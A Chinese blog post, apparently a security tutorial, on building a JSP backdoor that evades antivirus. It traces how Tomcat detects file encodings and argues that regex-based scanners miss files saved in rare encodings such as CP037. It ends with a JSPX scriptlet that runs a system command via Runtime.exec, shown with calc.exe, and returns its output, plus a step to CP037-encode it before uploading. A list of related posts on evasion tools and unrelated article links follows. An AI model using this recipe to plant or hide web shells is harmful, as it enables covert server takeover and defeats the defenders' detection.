利用JSP的编码特性制作免杀后门

这里是借鉴了Y4stacker师傅的thinkings

待解决的问题

1. JSP解析
2. JSP“乱码”为什么还能被识别
3. “乱码”的JSP在过滤时会被检测到吗？什么原因?
4. 为什么“乱码”可以用来做免杀？

JSP解析

其中EL等标记语言都是在jsp引擎中进行处理的，就是 识别+替换

JSP中的字符串是怎么被识别的？JSP“乱码”为什么还能被识别？

了解tomcat等服务器运行机理的最好，不了解也没关系，一步步来探究就行了。

• 首先下载tomcat源码包（github、官网都有）

这里下载的是8.5版本的

• 设置pom，导入依赖包
• 建立项目，编译运行

具体的过程，这里就不再仔细写了

开始调试了

• 直接打开乱码，需要手动加载下jsp解析器
  
  

• 直接访问index.jsp
  
  服务器端收到后，会先去work对应的目录下找是否有缓存，或者叫编译好的文件，有的话，直接用。没有的话就要从index.jsp中读，并解析编译加载。

• 找到文件后，对文件流先进行编码探测
  
  

这里采用的探测方式是读取前4个字节的内容，然后进行判别

• 这里列出了支持的多种编码

private BomResult parseBom(byte[] b4, int count) {

        if (count < 2) {

            return new BomResult("UTF-8", 0);

        }

        // UTF-16, with BOM

        int b0 = b4[0] & 0xFF;

        int b1 = b4[1] & 0xFF;

        if (b0 == 0xFE && b1 == 0xFF) {

            // UTF-16, big-endian

            return new BomResult("UTF-16BE", 2);

        }

        if (b0 == 0xFF && b1 == 0xFE) {

            // UTF-16, little-endian

            return new BomResult("UTF-16LE", 2);

        }

        // default to UTF-8 if we don't have enough bytes to make a

        // good determination of the encoding

        if (count < 3) {

            return new BomResult("UTF-8", 0);

        }

        // UTF-8 with a BOM

        int b2 = b4[2] & 0xFF;

        if (b0 == 0xEF && b1 == 0xBB && b2 == 0xBF) {

            return new BomResult("UTF-8", 3);

        }

        // default to UTF-8 if we don't have enough bytes to make a

        // good determination of the encoding

        if (count < 4) {

            return new BomResult("UTF-8", 0);

        }

        // Other encodings. No BOM. Try and ID encoding.

        int b3 = b4[3] & 0xFF;

        if (b0 == 0x00 && b1 == 0x00 && b2 == 0x00 && b3 == 0x3C) {

            // UCS-4, big endian (1234)

            return new BomResult("ISO-10646-UCS-4", 0);

        }

        if (b0 == 0x3C && b1 == 0x00 && b2 == 0x00 && b3 == 0x00) {

            // UCS-4, little endian (4321)

            return new BomResult("ISO-10646-UCS-4", 0);

        }

        if (b0 == 0x00 && b1 == 0x00 && b2 == 0x3C && b3 == 0x00) {

            // UCS-4, unusual octet order (2143)

            // REVISIT: What should this be?

            return new BomResult("ISO-10646-UCS-4", 0);

        }

        if (b0 == 0x00 && b1 == 0x3C && b2 == 0x00 && b3 == 0x00) {

            // UCS-4, unusual octet order (3412)

            // REVISIT: What should this be?

            return new BomResult("ISO-10646-UCS-4", 0);

        }

        if (b0 == 0x00 && b1 == 0x3C && b2 == 0x00 && b3 == 0x3F) {

            // UTF-16, big-endian, no BOM

            // (or could turn out to be UCS-2...

            // REVISIT: What should this be?

            return new BomResult("UTF-16BE", 0);

        }

        if (b0 == 0x3C && b1 == 0x00 && b2 == 0x3F && b3 == 0x00) {

            // UTF-16, little-endian, no BOM

            // (or could turn out to be UCS-2...

            return new BomResult("UTF-16LE", 0);

        }

        if (b0 == 0x4C && b1 == 0x6F && b2 == 0xA7 && b3 == 0x94) {

            // EBCDIC

            // a la xerces1, return CP037 instead of EBCDIC here

            return new BomResult("CP037", 0);

        }

        // default encoding

        return new BomResult("UTF-8", 0);

    }

• 探测到文件编码方式后，开始进行jsp解析，后面的内容先不管，我们主要是来分析支持的编码格式
  
  

“乱码”的JSP在过滤时会被检测到吗？什么原因?

由上面的编码解析可以知道，如果文件采用的是规定的诸多编码方式之一就可以被jsp解析器正常解析。解析器会先对流进行一个编码探测，然后再进行编码及解析。

为什么“乱码”可以用来做免杀？

这就和之前说的jsp免杀原理有些关联。大部分的查杀软件都是基于正则表达式进行匹配的，而对于一个文件流，查杀软件也比不可能对所有的编码形式都进行一次转换再来用正则匹配，这无疑会占据较高性能。所以如果使用了偏门的编码，查杀文件无法解析，但jsp解析器能正常解析，就达到免杀的目的。

直接开始实践

这里用最奇怪的“CP037”进行编码。

CP037要求的格式是前四个字节需要满足对应的关系

这里采用了Y4tacker师傅的用xml写jsp，第一次知道还可以这么操作。后来一想能用h5,就能用xml吧，毕竟两者是相近的标记语言

这里之所以判断是xml文件，是因为字节流经过cp037解码后是<?xm。所以如果采用其他的编码方式，应该先用对应的编码方式进行解码操作，判断指定字符串。

写的时候出现了两个问题

1. 格式不对。xml格式要求严格，必须按照要求来。不然很容易就报错，无法解析
2. 跟逻辑的时候，只跟了test.jsp,后面发现根本不被解析，然后发现是因为有个后缀判断，要求后缀名为jspx或tagx
   
   

Ending

<?xml version="1.0" encoding="cp037" ?>

<jsp:root version="1.2" xmlns:jsp="http://java.sun.com/JSP/Page">

    <jsp:directive.page contentType="text/html"/>

    <jsp:directive.page import="java.io.*"/>

    <jsp:declaration>

    </jsp:declaration>

    <jsp:scriptlet>

        Process process = Runtime.getRuntime().exec("calc.exe");

        BufferedReader in = new BufferedReader(new InputStreamReader(process.getInputStream()));

        String line = "";

        while((line=in.readLine())!=null){

            out.write(line+"\n");

        }

    </jsp:scriptlet>

    <jsp:text>

    </jsp:text>

</jsp:root>

先将代码用python进行cp037编码，再加载到web中

[JavaWeb]利用JSP的编码特性制作免杀后门的更多相关文章

1. 免杀后门之MSF&amp&semi;Veil-Evasion的完美结合

   本文由“即刻安全”投稿到“玄魂工作室” Veil-Evasion 是 Veil-Framework 框架的一部分,也是其主要的项目.利用它我们可以生成绕过杀软的 payload !kali 上并未安装 ...

2. 【转】PHP利用Apache、Nginx的特性实现免杀Webshell

   转载备忘: get_defined_vars().getallheaders()是两个特性函数,我们可以通过这两个函数来构造我们的webshell. 前几天看到的,一直忘记写,填坑. 环境 函数 用法 ...

3. 利用meterpreter下的Venom免杀后门

   转载请注明作者:admin-神风 下载地址:https://github.com/r00t-3xp10it/venom .从Github上下载框架: tar.gz OR zip OR git clon ...

4. 免杀后门&lpar;四&rpar;之shellter注入绕过

   文中提及的部分技术可能带有一定攻击性,仅供安全学习和教学用途,禁止非法使用 Shellter 是一款动态 shellcode 注入工具.利用它,我们可以将shell注入到其他的可执行程序上,从而躲避安 ...

5. 2018-2019-2 网络对抗技术 20165206 Exp3 免杀原理与实践

   - 2018-2019-2 网络对抗技术 20165206 Exp3 免杀原理与实践 - 实验任务 1 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己 ...

6. Exp3 免杀原理和实践

   一.基础问题回答 1.杀软是如何检测出恶意代码的? (1)基于特征码的检测 特征码是能识别一个程序是一个病毒的一段不大于64字节的特征串.如果一个可执行文件包含这样的特征码则被杀毒软件检测为是恶意代码 ...

7. 20145215《网络对抗》Exp3 免杀原理与实践

   20145215<网络对抗>Exp3 免杀原理与实践 基础问题回答 杀软是如何检测出恶意代码的? 基于特征来检测:恶意代码中一般会有一段有较明显特征的代码也就是特征码,如果杀毒软件检测到有 ...

8. 20145308 《网络对抗》 MAL&lowbar;免杀原理及实践 学习总结

   20145308 <网络对抗> MAL_免杀原理及实践 学习总结 实践内容 (1)理解免杀技术原理 (2)正确使用msf编码器,veil-evasion,自己利用shellcode编程等免 ...

9. 20155207 《网络对抗技术》EXP3 免杀原理与实践

   20155207 <网络对抗技术>EXP3 免杀原理与实践 基础问题回答 杀软是如何检测出恶意代码的? - 根据特征码进行检测(静态) - 启发式(模糊特征点.行为 ) - 根据行为进行检 ...

随机推荐

1. 演化理解 Android 异步加载图片

   原文:http://www.cnblogs.com/ghj1976/archive/2011/05/06/2038738.html#3018499 在学习"Android异步加载图像小结&q ...

2. MySQL定期分析检查与优化表

   定期分析表   ANALYZE [LOCAL | NO_WRITE_TO_BINLOG] TABLE tbl_name [, tbl_name]   本语句用于分析和存储表的关键字分布.在分析期间,使 ...

3. CentOS升级Python的方法

   centOS内核版本为:3.10.101-1.el6.elrepo.x86_64 1,下载Python安装包 wget http://www.python.org/ftp/python/2.7.6/P ...

4. 项目管理模式之如何去除SVN标记

   原问地址:http://blog.csdn.net/djcken/article/details/7916986      当项目不需要SVN标志的时候,我们一般怎么办哪??可能很多人设置Window ...

5. Sublime Text 3 无法使用package control安装插件解决办法

   Crossing's Blog NOT Genius but Try Best 首页 分类 关于 归档 标签 问题貌似出现在liveStyle版本更新之后,因为打算安装javascript next和 ...

6. MIB Browser如何导入已编译的mib

   开发过程中,如果需要来回在几套mib之间来回切换,每次都进行编译工作那将是一件很繁琐的事情,我们可以直接导入已经编译好的mib文件,避免重复的编译工作. 第一步,备份已经编译好的mib文件.    将 ...

7. win10系统上Python和pycharm的安装及配置

   1.https://www.python.org/downloads/windows/进入官网下载需要的Python安装包(以2.7版本为例) 2.http://www.jetbrains.com/p ...

8. 大数据入门第九天——MapReduce详解（六）MR其他补充

   一.自定义in/outputFormat 1.需求 现有一些原始日志需要做增强解析处理,流程: 1. 从原始日志文件中读取数据 2. 根据日志中的一个URL字段到外部知识库中获取信息增强到原始日志 3 ...

9. LEP所需环境

   一.LEP所需环境 Python 3.6 Flask Docker 二.Python安装 LEP必须在Python3.6环境下运行,如果是在Python2.7下运行会报以下错误! Python3.6的 ...

10. laravel with嵌套的渴求式加载

    今天在通过需求表A查询场地类型表B,然后通过表B的场地类型id去查询表C场地类型名的时候遇到了一个小的问题. 需求表A的字段:id.user_id .name等等: 中间表B的字段:id.appeal ...